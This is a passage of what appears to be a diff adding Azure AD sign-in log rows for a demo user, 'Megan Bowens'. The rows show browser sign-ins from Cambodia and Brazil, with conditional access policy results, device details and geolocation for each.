+1638,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:09.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,10e74289-d0ba-4f40-bfc4-2a3f434bf215,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",189268ff-d871-4dc4-914e-2c96e1f70700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,189268ff-d871-4dc4-914e-2c96e1f70700,SigninLogs,Sucess,13,105
+1639,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,de30abe9-3e5f-4a55-b663-aefa53ae04b2,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a269e9a0600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d3a3c86e-d6a1-4323-9bc0-1a269e9a0600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1640,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,46b4579b-d082-4360-9206-356239630e17,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0eaac4b0800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0eaac4b0800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1641,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d2317807-b76c-47be-8f8a-a3ecbd9d0241,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0ea3c4d0800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0ea3c4d0800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1642,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53a327f5-0b93-4eef-80fa-0813b03a7c83,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",24b904d7-063a-4f4c-9637-40c711510800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,24b904d7-063a-4f4c-9637-40c711510800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1643,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0a3fe0e-a6a9-43cb-96eb-09b9cf77565d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",82f6237a-3f5a-4c05-babd-ae7913fc0500,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,82f6237a-3f5a-4c05-babd-ae7913fc0500,SigninLogs,Sucess,-20.54751015,-47.4056282
+1644,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8d298c27-e905-4e09-a129-768a5fec15d5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5710832e-d5f6-411b-b39c-0449a4400700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5710832e-d5f6-411b-b39c-0449a4400700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1645,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f940753c-6557-400b-9683-1256a5cff45c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 